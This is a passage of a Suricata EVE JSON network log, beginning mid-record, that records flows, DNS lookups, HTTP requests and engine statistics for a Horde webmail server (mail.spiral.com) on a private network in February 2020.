gr":{"closed_pruned":2788,"new_pruned":16,"est_pruned":2433,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19838,"memcap_state":0,"memcap_global":0},"http":{"memuse":36612,"memcap":0}}} {"timestamp":"2020-02-29T00:17:46.002322+0000","flow_id":989009308065649,"event_type":"flow","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.958321+0000","end":"2020-02-29T00:12:45.066699+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:48.000764+0000","flow_id":1965379946389945,"event_type":"flow","src_ip":"fe80:0000:0000:0000:f816:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:17:17.958905+0000","end":"2020-02-29T00:17:17.958905+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:50.000513+0000","flow_id":1057054490648417,"event_type":"flow","src_ip":"192.168.10.81","src_port":52766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10115,"start":"2020-02-29T00:16:44.024417+0000","end":"2020-02-29T00:16:49.489828+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:50.000663+0000","flow_id":101213813529097,"event_type":"flow","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1416,"bytes_toclient":20622,"start":"2020-02-29T00:16:38.383497+0000","end":"2020-02-29T00:16:49.869586+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:52.000591+0000","flow_id":340808549256710,"event_type":"flow","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:51.118278+0000","end":"2020-02-29T00:12:51.226233+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:52.001953+0000","flow_id":1932059572600311,"event_type":"flow","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:50.949751+0000","end":"2020-02-29T00:12:51.058015+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:53.000183+0000","event_type":"stats","stats":{"uptime":14725,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2790,"new_pruned":17,"est_pruned":2437,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":36532,"memcap":0}}} {"timestamp":"2020-02-29T00:17:53.002632+0000","flow_id":363769459871467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1154,"bytes_toclient":654,"start":"2020-02-29T00:16:47.167659+0000","end":"2020-02-29T00:16:52.301912+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:59.499151+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27338,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:59.702081+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:18:00.000341+0000","event_type":"stats","stats":{"uptime":14732,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2439,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":88251,"memcap":0}}} {"timestamp":"2020-02-29T00:18:00.001510+0000","flow_id":859365721232905,"event_type":"flow","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:59.579081+0000","end":"2020-02-29T00:12:59.687284+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:03.353729+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:03.630319+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319}} {"timestamp":"2020-02-29T00:18:04.703159+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52770,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":22300,"tx_id":0}} {"timestamp":"2020-02-29T00:18:06.824223+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61183,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:06.932681+0000","flow_id":2079140748366751,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33356,"proto":"UDP","dns":{"type":"answer","id":61183,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:18:06.951877+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":15,"tx_id":0}} {"timestamp":"2020-02-29T00:18:07.000351+0000","event_type":"stats","stats":{"uptime":14739,"capture":{"kernel_packets":136428,"kernel_drops":0},"decoder":{"pkts":136435,"bytes":93767765,"invalid":192,"ipv4":134904,"ipv6":10,"ethernet":136435,"raw":0,"null":0,"sll":0,"tcp":129487,"udp":5210,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2806,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2822,"synack":2813,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1843,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2384,"failed_udp":112},"tx":{"http":4710,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2464}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2440,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19509,"memcap_state":0,"memcap_global":0},"http":{"memuse":161241,"memcap":0}}} {"timestamp":"2020-02-29T00:18:07.317763+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29394,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:07.426181+0000","flow_id":362352125925699,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34535,"proto":"UDP","dns":{"type":"answer","id":29394,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:07.516716+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34870,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606}} {"timestamp":"2020-02-29T00:18:08.001099+0000","flow_id":1204526473524166,"event_type":"flow","src_ip":"192.168.10.122","src_port":46995,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:07.308166+0000","end":"2020-02-29T00:13:07.416966+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:08.631175+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34868,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35058,"tx_id":0}} {"timestamp":"2020-02-29T00:18:10.771454+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":8098,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:10.880127+0000","flow_id":1370887756629374,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50796,"proto":"UDP","dns":{"type":"answer","id":8098,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:10.964330+0000","flow_id":1132834899264066,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34872,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4935}} {"timestamp":"2020-02-29T00:18:11.000525+0000","flow_id":1491443173997920,"event_type":"flow","src_ip":"192.168.10.122","src_port":42597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:10.769376+0000","end":"2020-02-29T00:13:10.877835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000727+0000","flow_id":1108070098154454,"event_type":"flow","src_ip":"192.168.10.122","src_port":53042,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.603094+0000","end":"2020-02-29T00:13:10.711700+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.000795+0000","flow_id":969226690410159,"event_type":"flow","src_ip":"192.168.10.122","src_port":37907,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:10.177839+0000","end":"2020-02-29T00:13:10.286032+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:11.152034+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25116,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:11.146917+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52772,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=mnemo&imple=Mnemo_Ajax_Imple_TagAutoCompleter&input=memo_tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.260439+0000","flow_id":1665067602402,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37306,"proto":"UDP","dns":{"type":"answer","id":25116,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:18:11.388183+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":208,"tx_id":1}} {"timestamp":"2020-02-29T00:18:11.398435+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61759,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:11.506897+0000","flow_id":807637155517539,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41542,"proto":"UDP","dns":{"type":"answer","id":61759,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:11.621320+0000","flow_id":588464974095740,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52772,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5780}} {"timestamp":"2020-02-29T00:18:12.004506+0000","flow_id":682082356943433,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:13:11.449097+0000","end":"2020-02-29T00:13:11.561870+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:12.519018+0000","flow_id":2124693171580563,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34870,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5606},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20704,"tx_id":0}} {"timestamp":"2020-02-29T00:18:13.000312+0000","flow_id":1019705441143674,"event_type":"flow","src_ip":"192.168.10.122","src_port":44779,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:12.019322+0000","end":"2020-02-29T00:13:12.127791+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 